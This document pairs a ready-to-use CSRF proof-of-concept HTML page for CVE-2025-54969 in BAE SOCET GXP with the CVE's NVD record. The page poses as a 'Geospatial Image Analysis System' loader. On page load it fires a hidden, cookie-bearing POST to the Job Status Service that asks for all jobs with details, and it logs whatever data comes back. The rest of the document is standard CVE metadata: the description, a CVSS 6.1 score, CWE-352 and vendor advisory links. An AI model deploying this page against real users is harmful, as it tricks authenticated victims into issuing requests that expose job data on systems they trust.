CVE-2025-54969

<!-- CSRF PoC for CVE-2025-54969 --> <!-- BAE SOCET GXP Job Status Service CSRF Exploit --> <!DOCTYPE html> <html> <head> <title>SOCET GXP Job Status Query</title> </head> <body> <h2>Geospatial Image Analysis System</h2> <p>Loading job status data...</p> <!-- Auto-submit form to Job Status Service --> <form id="csrfForm" action="https://target-server/socet-gxp/api/jobstatus" method="POST" style="display:none;"> <input type="hidden" name="action" value="query" /> <input type="hidden" name="job_id" value="*" /> <input type="hidden" name="include_details" value="true" /> </form> <!-- Alternative: Direct XMLHttpRequest for more control --> <script> // Wait for page load window.onload = function() { console.log('[CSRF] Initiating request to SOCET GXP Job Status Service'); // Method 1: Auto-submit form // document.getElementById('csrfForm').submit(); // Method 2: XMLHttpRequest with JSON payload var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://target-server/socet-gxp/api/jobstatus', true); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.withCredentials = true; // Include cookies xhr.send(JSON.stringify({ action: 'query', job_id: '*', include_details: true })); xhr.onload = function() { if (xhr.status === 200) { console.log('[CSRF] Request successful - Job status data may have been exposed'); console.log('[CSRF] Response:', xhr.responseText); } }; xhr.onerror = function() { console.log('[CSRF] Request failed - Target may be offline or CSRF protection applied'); }; }; </script> </body> </html>

{"cve": {"id": "CVE-2025-54969", "sourceIdentifier": "[email protected]", "published": "2025-10-27T17:15:38.587", "lastModified": "2025-10-31T20:31:00.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.2. The SOCET GXP Job Status Service does not implement CSRF protections. An attacker who social engineers a valid user into clicking a malicious link or visiting a malicious website may be able to submit requests to the Job Status Service without the user's knowledge."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.2", "matchCriteriaId": "6BF9E6F9-E4EA-4880-9B20-2CEDD7D118C8"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54969", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}